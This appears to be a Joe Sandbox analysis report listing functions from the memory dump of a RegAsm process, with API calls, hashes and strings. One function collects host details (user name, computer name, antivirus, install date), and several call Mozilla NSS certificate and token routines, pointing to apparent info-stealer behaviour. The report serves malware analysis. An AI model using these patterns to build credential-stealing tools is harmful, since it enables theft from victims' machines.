String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction ID: a738addbbfcb5581dbeaf62b254c3fbf004fdb1dbbbb6a7a041229699445b56b
Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction Fuzzy Hash: 3D217471611249AFCB21DF1CD444AA97BB4EF0534AB14806AE845CB367E738D987CB48

Function 004212DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 004212E7
DName::DName.LIBCMT ref: 004212F3

Part of subcall function 0041EFBE: DName::doPchar.LIBCMT ref: 0041EFEF

UnDecorator::getScopedName.LIBCMT ref: 00421332
DName::operator+=.LIBCMT ref: 0042133C
DName::operator+=.LIBCMT ref: 0042134B
DName::operator+=.LIBCMT ref: 00421357
DName::operator+=.LIBCMT ref: 00421364

Strings

void, xrefs: 00421343

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction ID: c2652f7c91e1ef5edc9e2e1e9b8a32b02dad70e76bfe1aa60437c31099f645d5
Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction Fuzzy Hash: 75112C75600218BFD704EF68D855BEE7F64AF10309F44009FE416972E2DB38DA85C748

Function 00411563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
ReleaseDC.USER32(00000000,00000000), ref: 00411596
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
wsprintfA.USER32 ref: 004115BB

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

%dx%d, xrefs: 004115B5

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction ID: 170008d2b248a6dac6df5cacbd3238be6a4bc1abd9d224a85ffebcf6f0d8f3fd
Opcode Fuzzy Hash: b27d7dd64cfe0a637a361d43d9ca9a290f2284dc2a72474dda508b1b2504b9a3
Instruction Fuzzy Hash: 59F0C832601320BBEB249BA59C0DD9B7EAEEF467A7F005451F605D2160E6B75E4087A0

Function 6CA7CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6CA7CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6CA7CE16
PR_SetError.NSS3(00000000,00000000), ref: 6CA7D079

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: a0171dbabb865e0a4687e613b73e7d290cf9220f3943379aedd14c7313831070
Instruction ID: 7bf0efc06cc6bbdca77713188cb6d42bdb2f5bc1a956e4a77610bbe9bb7f60e1
Opcode Fuzzy Hash: a0171dbabb865e0a4687e613b73e7d290cf9220f3943379aedd14c7313831070
Instruction Fuzzy Hash: 94C19FB5E002199BDB20CF24CD84BDAB7B4BB48318F1441A8D949A7741E775EED9CFA0

Function 6CA6DC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6CA797C1,?,00000000,00000000,?,?,?,00000000,?,6CA57F4A,00000000), ref: 6CA6DC68

Part of subcall function 6CA90BE0: malloc.MOZGLUE(6CA88D2D,?,00000000,?), ref: 6CA90BF8
Part of subcall function 6CA90BE0: TlsGetValue.KERNEL32(6CA88D2D,?,00000000,?), ref: 6CA90C15

PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DD36
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DE2D
memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6CA57F4A,00000000,?,00000000,00000000), ref: 6CA6DFAA

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: d1e0bcc7da1852adf4fa738c16b356752e34ebb5680d909712ffc83f61931d40
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: FF81C370E066048BFB148E5BC8A036976F6DB657C8F38883AD919CAFE1D775C4C4C642

Function 6CA43C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6CA43C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA43C94

Part of subcall function 6CA395B0: TlsGetValue.KERNEL32(00000000,?,6CA500D2,00000000), ref: 6CA395D2
Part of subcall function 6CA395B0: EnterCriticalSection.KERNEL32(?,?,?,6CA500D2,00000000), ref: 6CA395E7
Part of subcall function 6CA395B0: PR_Unlock.NSS3(?,?,?,?,6CA500D2,00000000), ref: 6CA39605

PORT_NewArena_Util.NSS3(00000800), ref: 6CA43CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6CA43CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6CA43CE1

Part of subcall function 6CA43090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CA5AE42), ref: 6CA430AA
Part of subcall function 6CA43090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA430C7
Part of subcall function 6CA43090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CA430E5
Part of subcall function 6CA43090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA43116
Part of subcall function 6CA43090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA4312B
Part of subcall function 6CA43090: PK11_DestroyObject.NSS3(?,?), ref: 6CA43154
Part of subcall function 6CA43090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA4317E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 03565fcd371bcd36f54fee12a3b2ed7b2ce7f9f5c36c230fe0085a2415ecc761
Instruction ID: dee7e4e2ae80820ad4204030c7cabe0fccf6bb512b84fddb5455a476caa058da
Opcode Fuzzy Hash: 03565fcd371bcd36f54fee12a3b2ed7b2ce7f9f5c36c230fe0085a2415ecc761
Instruction Fuzzy Hash: 9461D875A01200ABEB105E65DD42FBB76F9AF04748F088038FE499A652F721D998C7B1

Function 6CA83D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6CA83440: PK11_GetAllTokens.NSS3 ref: 6CA83481
Part of subcall function 6CA83440: PR_SetError.NSS3(00000000,00000000), ref: 6CA834A3
Part of subcall function 6CA83440: TlsGetValue.KERNEL32 ref: 6CA8352E
Part of subcall function 6CA83440: EnterCriticalSection.KERNEL32(?), ref: 6CA83542
Part of subcall function 6CA83440: PR_Unlock.NSS3(?), ref: 6CA8355B

TlsGetValue.KERNEL32 ref: 6CA83D8B
EnterCriticalSection.KERNEL32(?), ref: 6CA83D9F
PR_Unlock.NSS3(?), ref: 6CA83DCA
PR_SetError.NSS3(00000000,00000000), ref: 6CA83DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA83E4F

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

TlsGetValue.KERNEL32 ref: 6CA83E97
EnterCriticalSection.KERNEL32(?), ref: 6CA83EAB
PR_Unlock.NSS3(?), ref: 6CA83ED6
PR_SetError.NSS3(00000000,00000000), ref: 6CA83EEE

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: 4be2e01abc1f9cc648e3ee2b7918a408421d49b5153ec326bb6dfe9d3b7c9279
Instruction ID: 57d312bb8e95cb516fc8cc15cdb579934dfdf7f76b8569d71a20a2d2786e1fbc
Opcode Fuzzy Hash: 4be2e01abc1f9cc648e3ee2b7918a408421d49b5153ec326bb6dfe9d3b7c9279
Instruction Fuzzy Hash: 46511671E036009FDB116F29DD44B6A73B4AF46318F094528DE8947B12EB31E9D8CBE1

Function 6CA32C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(F6A4F48B), ref: 6CA32C5D

Part of subcall function 6CA90D30: calloc.MOZGLUE ref: 6CA90D50
Part of subcall function 6CA90D30: TlsGetValue.KERNEL32 ref: 6CA90D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6CA32C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA32CE0

Part of subcall function 6CA32E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA32CDA,?,00000000), ref: 6CA32E1E
Part of subcall function 6CA32E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA32E33
Part of subcall function 6CA32E00: TlsGetValue.KERNEL32 ref: 6CA32E4E
Part of subcall function 6CA32E00: EnterCriticalSection.KERNEL32(?), ref: 6CA32E5E
Part of subcall function 6CA32E00: PL_HashTableLookup.NSS3(?), ref: 6CA32E71
Part of subcall function 6CA32E00: PL_HashTableRemove.NSS3(?), ref: 6CA32E84
Part of subcall function 6CA32E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA32E96
Part of subcall function 6CA32E00: PR_Unlock.NSS3 ref: 6CA32EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA32D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6CA32D30
CERT_MakeCANickname.NSS3(00000001), ref: 6CA32D3F
free.MOZGLUE(00000000), ref: 6CA32D73
CERT_DestroyCertificate.NSS3(?), ref: 6CA32DB8
free.MOZGLUE ref: 6CA32DC8

Part of subcall function 6CA33E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA33EC2
Part of subcall function 6CA33E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA33ED6
Part of subcall function 6CA33E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA33EEE
Part of subcall function 6CA33E60: PR_CallOnce.NSS3(6CB92AA4,6CA912D0), ref: 6CA33F02
Part of subcall function 6CA33E60: PL_FreeArenaPool.NSS3 ref: 6CA33F14
Part of subcall function 6CA33E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA33F27

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 464ca1321f6c2e4a17f35c19ef6077a53f9b812068a8d4ca94a441e2cb8e3315
Instruction ID: b0d961e367b690013f7c1e319c61418877701eb5cc8eb4e2a26988b11cfa66aa
Opcode Fuzzy Hash: 464ca1321f6c2e4a17f35c19ef6077a53f9b812068a8d4ca94a441e2cb8e3315
Instruction Fuzzy Hash: 5251F3716043219BD7029E25DCA5B5B77E5EF84388F18062CEC5DC3652E731E8988BD2

Function 6CA37CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA340D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CA33F7F,?,00000055,?,?,6CA31666,?,?), ref: 6CA340D9
Part of subcall function 6CA340D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6CA31666,?,?), ref: 6CA340FC
Part of subcall function 6CA340D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6CA31666,?,?), ref: 6CA34138

PR_GetCurrentThread.NSS3 ref: 6CA37CFD

Part of subcall function 6CAF9BF0: TlsGetValue.KERNEL32(?,?,?,6CB40A75), ref: 6CAF9C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6CB59030), ref: 6CA37D1B

Part of subcall function 6CA8FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6CA31A3E,00000048,00000054), ref: 6CA8FD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6CB59048), ref: 6CA37D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6CA37D50
PR_GetCurrentThread.NSS3 ref: 6CA37D61
PORT_ArenaMark_Util.NSS3(?), ref: 6CA37D7D
free.MOZGLUE(?), ref: 6CA37D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6CA37DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6CA37E19

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: 02712d3f589d5aa5bc7608c2dd7ccd8aece69d01e8f67dd6ff051cf4331548ea
Instruction ID: cec2cc594f955b2fd53a847096edc78ac15ad6dfafc87b2557339bc98c1c0045
Opcode Fuzzy Hash: 02712d3f589d5aa5bc7608c2dd7ccd8aece69d01e8f67dd6ff051cf4331548ea
Instruction Fuzzy Hash: 8A410972A0012ADBDB019E699E51BAF33E8AF4039CF090024ED1DD7750E730E999CBA1

Function 6CA47EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6CA480DD), ref: 6CA47F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6CA480DD), ref: 6CA47F36
free.MOZGLUE(?,?,?,6CA480DD), ref: 6CA47F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6CA480DD), ref: 6CA47F5D
DeleteCriticalSection.KERNEL32(?,6CA480DD), ref: 6CA47F94
free.MOZGLUE(?), ref: 6CA47F9B
PR_SetError.NSS3(FFFFE08B,00000000,6CA480DD), ref: 6CA47FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6CA480DD), ref: 6CA47FE6
free.MOZGLUE(?,6CA480DD), ref: 6CA4802D

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 0b1f645c0735a1af631880dd9d264570a99930bdaa77e1a81182585fb7fef61f
Instruction ID: 3d6224e0458ea6f94b4cea66f69887f0051b68356bd08d6f8a3a618e0e6c70eb
Opcode Fuzzy Hash: 0b1f645c0735a1af631880dd9d264570a99930bdaa77e1a81182585fb7fef61f
Instruction Fuzzy Hash: 784109B1F421604BDF10DFB8DA89A4A37B5AB47358F154229E919C7B40D730D49DCBA2

Function 6CA8FEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA8FF00

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6CA8FF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CA8FF26
PORT_ArenaMark_Util.NSS3(?), ref: 6CA8FF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA8FF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA8FF8C

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: 9cc65a8fd5f1445c370d54c25946a23db1e35ee5fbb7fba74ea3fdbc113535a8
Instruction ID: 212fe36715fb6997d65a16738289a557bb6936b7635d1bee28b43148ab82e1fe
Opcode Fuzzy Hash: 9cc65a8fd5f1445c370d54c25946a23db1e35ee5fbb7fba74ea3fdbc113535a8
Instruction Fuzzy Hash: CE3127B2D023139BE7108E588C81B5A76E8AF96348F28413DED1897740EB31DD98C7D1

Function 6CA94DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CA9536F,00000022,?,?,00000000,?), ref: 6CA94E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CA94F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CA94F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CA94FAE
free.MOZGLUE(?), ref: 6CA94FC8

Strings

%s=%s, xrefs: 6CA94F89
%s=%c%s%c, xrefs: 6CA94FA9

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: cda29f1389d6fa5b329081b3a9aa5bb2f7fbcc30cdd5914a7d1011b40204f679
Instruction ID: fcc8135be8550ffbf94ac793a9a99598f24145db5877f301e3b50ccc26f43484
Opcode Fuzzy Hash: cda29f1389d6fa5b329081b3a9aa5bb2f7fbcc30cdd5914a7d1011b40204f679
